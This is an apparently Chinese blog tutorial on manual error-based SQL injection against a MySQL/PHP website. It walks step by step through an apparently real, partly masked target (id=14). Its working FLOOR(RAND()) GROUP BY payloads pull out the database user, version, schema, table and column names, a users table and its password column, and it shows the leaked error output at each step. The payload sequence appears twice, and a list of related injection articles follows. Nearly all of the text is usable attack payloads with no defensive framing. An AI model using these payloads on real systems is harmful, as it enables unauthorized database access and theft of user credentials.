mysql-php基于“错误”的手工注入----(select *)
2014-10-13 10:56
776 查看
1.注入点:
http://www.******/index.php?********&id=14
2.确定当前用户:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:*******_dbadmin@localhost
3.确定数据库版本:
AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
解析如下:
AND(
SELECT 8471 FROM
(SELECT COUNT(*),
CONCAT(0x716b6b7671,
(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x
FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x
)a
)
提示错误: 5.5.37-cll
4.确定数据库:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:******_web
5.确定当前is_dba:(此语句搞错了)
AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP
BY x)a)
6.确定数据库中的表个数及其名称:
AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
提示错误:个数是166个,,,提示 table_schema in(0x******************),参数为数据库名称的十六进制表示
以此确定每个表的名称:
AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************)
LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
---- 提示:limit 0,1是确定表名称的次序。0,1表示第一个表名称;1,1表示第二个表名称;33,1表示第34个表的名称。提示table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数数据库名称
提示错误:
7.确定表的列数及其名称:
AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
依次确定列名称:
AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT
0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
解析基于错误的SQL语句:
解析结果如下:
SELECT 4537 FROM
(
SELECT COUNT(*),
CONCAT(
0x716b6b7671,
(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema IN (0x*****************)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a
红色部分:根据个人需求变化
8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************)
LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
语句中column_name=0x******************查询列字段的名称(16进制)
9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********
AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
10.查询内部用户的信息:
AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a)
http://www.******/index.php?********&id=14
2.确定当前用户:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:*******_dbadmin@localhost
3.确定数据库版本:
AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
解析如下:
AND(
SELECT 8471 FROM
(SELECT COUNT(*),
CONCAT(0x716b6b7671,
(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x
FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x
)a
)
提示错误: 5.5.37-cll
4.确定数据库:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:******_web
5.确定当前is_dba:(此语句搞错了)
AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP
BY x)a)
6.确定数据库中的表个数及其名称:
AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
提示错误:个数是166个,,,提示 table_schema in(0x******************),参数为数据库名称的十六进制表示
以此确定每个表的名称:
AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************)
LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
---- 提示:limit 0,1是确定表名称的次序。0,1表示第一个表名称;1,1表示第二个表名称;33,1表示第34个表的名称。提示table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数数据库名称
提示错误:
7.确定表的列数及其名称:
AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
依次确定列名称:
AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT
0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
解析基于错误的SQL语句:
解析结果如下:
SELECT 4537 FROM
(
SELECT COUNT(*),
CONCAT(
0x716b6b7671,
(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema IN (0x*****************)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a
红色部分:根据个人需求变化
8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************)
LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
语句中column_name=0x******************查询列字段的名称(16进制)
9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********
AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
10.查询内部用户的信息:
AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a)
相关文章推荐
- PHP+MySQL 手工注入语句
- PHP+MySQL 手工注入语句大全
- PHP+MySQL环境下的SQL手工注入教程
- php―mysql 5.0以上手工注入实战
- PHP+MySQL 手工注入语句大全 推荐
- 记一次php手工注入(mysql)
- PHP+MySQL 手工注入语句
- PHP+MySQL 手工注入语句大全 推荐
- PHP+MySQL 手工注入语句大全
- php+mysql 注入
- 防止MySQL注入或HTML表单滥用的PHP程序
- “无法载入 mysql 扩展,请检查 PHP 配置”的 错误提示
- 利用PHP程序设定防止MySQL注入或HTML表单滥用
- 利用PHP程序设定防止MySQL注入或HTML表单滥用
- 基于PHP+MySQL的聊天室设计
- 从php+mysql环境的注入,到整台服务器的沦陷
- 手工编译安装php后,重启apache时,libphp5.so: cannot restore segment prot after reloc: Permission denied 错误的解决办法
- [转载]php+Mysql注入详解
- mysql查询错误原因+PHP复选框
- PHP和MySQL中如何进行错误处理与调试